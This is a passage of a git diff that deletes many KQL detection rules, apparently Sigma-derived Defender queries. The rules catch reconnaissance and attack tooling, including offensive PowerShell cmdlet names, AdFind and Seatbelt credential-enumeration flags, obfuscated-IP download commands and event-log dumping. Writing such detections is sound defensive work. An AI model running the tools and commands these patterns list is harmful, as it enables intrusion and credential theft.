"Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/Discovery/Network_Reconnaissance_Activity.kql b/Discovery/Network_Reconnaissance_Activity.kql
deleted file mode 100644
index 511409c8..00000000
--- a/Discovery/Network_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/07
-// Level: high
-// Description: Detects a set of suspicious network related commands often used in recon stages
-// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Nltest.EXE_Execution.kql b/Discovery/Nltest.EXE_Execution.kql
deleted file mode 100644
index fbb98d57..00000000
--- a/Discovery/Nltest.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Arun Chauhan
-// Date: 2023/02/03
-// Level: low
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
-DeviceProcessEvents
-| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Download_Activity.kql b/Discovery/Obfuscated_IP_Download_Activity.kql
deleted file mode 100644
index 20e6fdaa..00000000
--- a/Discovery/Obfuscated_IP_Download_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Via_CLI.kql b/Discovery/Obfuscated_IP_Via_CLI.kql
deleted file mode 100644
index 43d59e08..00000000
--- a/Discovery/Obfuscated_IP_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql b/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
deleted file mode 100644
index 665b314e..00000000
--- a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
-// Date: 2021/02/02
-// Level: high
-// Description: Detects AdFind execution with common flags seen used during attacks
-// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
-DeviceProcessEvents
-| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Adidnsdump_Execution.kql b/Discovery/PUA_-_Adidnsdump_Execution.kql
deleted file mode 100644
index 18f6a3fc..00000000
--- a/Discovery/PUA_-_Adidnsdump_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
-Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
-
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
deleted file mode 100644
index 0d88a8e3..00000000
--- a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
deleted file mode 100644
index 7d57516a..00000000
--- a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects the use of Advanced Port Scanner.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Crassus_Execution.kql b/Discovery/PUA_-_Crassus_Execution.kql
deleted file mode 100644
index a6d0a8b2..00000000
--- a/Discovery/PUA_-_Crassus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
-// Tags: attack.discovery, attack.t1590.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Seatbelt_Execution.kql b/Discovery/PUA_-_Seatbelt_Execution.kql
deleted file mode 100644
index 4a282d83..00000000
--- a/Discovery/PUA_-_Seatbelt_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
-// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
-DeviceProcessEvents
-| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql b/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
deleted file mode 100644
index 66385a3e..00000000
--- a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
-It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
-
-// Tags: attack.discovery, attack.t1046
-DeviceProcessEvents
-| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql b/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
deleted file mode 100644
index 14d15c3a..00000000
--- a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: high
-// Description: Detects active directory enumeration activity using known AdFind CLI flags
-// Tags: attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/Discovery/Permission_Check_Via_Accesschk.EXE.kql b/Discovery/Permission_Check_Via_Accesschk.EXE.kql
deleted file mode 100644
index 7b93caa8..00000000
--- a/Discovery/Permission_Check_Via_Accesschk.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql b/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
deleted file mode 100644
index d61c3ee0..00000000
--- a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
-// Tags: attack.discovery, attack.t1012, attack.t1007
-DeviceProcessEvents
-| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql b/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
deleted file mode 100644
index 830e114d..00000000
--- a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/19
-// Level: high
-// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql b/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
deleted file mode 100644
index 97fbb117..00000000
--- a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Craig Young, oscd.community, Georg Lauenstein
-// Date: 2021/07/24
-// Level: medium
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1482
-DeviceProcessEvents
-| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Discovery/Python_Initiated_Connection.kql b/Discovery/Python_Initiated_Connection.kql
deleted file mode 100644
index 73ccfb59..00000000
--- a/Discovery/Python_Initiated_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: medium
-// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
-// Tags: attack.discovery, attack.t1046
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath contains "python" and (not((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1"))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql b/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
deleted file mode 100644
index 2a95db99..00000000
--- a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/07/06
-// Level: medium
-// Description: Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.
-
-// Tags: attack.discovery, attack.t1057
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all | find " or ProcessCommandLine contains "ipconfig /all | findstr " or ProcessCommandLine contains "ipconfig | find " or ProcessCommandLine contains "ipconfig | findstr " or ProcessCommandLine contains "ipconfig.exe /all | find " or ProcessCommandLine contains "ipconfig.exe /all | findstr " or ProcessCommandLine contains "ipconfig.exe | find " or ProcessCommandLine contains "ipconfig.exe | findstr " or ProcessCommandLine contains "net start | find" or ProcessCommandLine contains "net start | findstr" or ProcessCommandLine contains "net.exe start | find" or ProcessCommandLine contains "net.exe start | findstr" or ProcessCommandLine contains "net1 start | find" or ProcessCommandLine contains "net1 start | findstr" or ProcessCommandLine contains "net1.exe start | find" or ProcessCommandLine contains "net1.exe start | findstr" or ProcessCommandLine contains "netstat -ano | find" or ProcessCommandLine contains "netstat -ano | findstr" or ProcessCommandLine contains "netstat | find" or ProcessCommandLine contains "netstat | findstr" or ProcessCommandLine contains "netstat.exe -ano | find" or ProcessCommandLine contains "netstat.exe -ano | findstr" or ProcessCommandLine contains "netstat.exe | find" or ProcessCommandLine contains "netstat.exe | findstr" or ProcessCommandLine contains "ping | find" or ProcessCommandLine contains "ping | findstr" or ProcessCommandLine contains "ping.exe | find" or ProcessCommandLine contains "ping.exe | findstr" or ProcessCommandLine contains "systeminfo | find " or ProcessCommandLine contains "systeminfo | findstr " or ProcessCommandLine contains "systeminfo.exe | find " or ProcessCommandLine contains "systeminfo.exe | findstr " or ProcessCommandLine contains "tasklist | find " or ProcessCommandLine contains "tasklist | findstr " or ProcessCommandLine contains "tasklist.exe | find " or ProcessCommandLine contains "tasklist.exe | findstr " or ProcessCommandLine contains "whoami /all | find " or ProcessCommandLine contains "whoami /all | findstr " or ProcessCommandLine contains "whoami.exe /all | find " or ProcessCommandLine contains 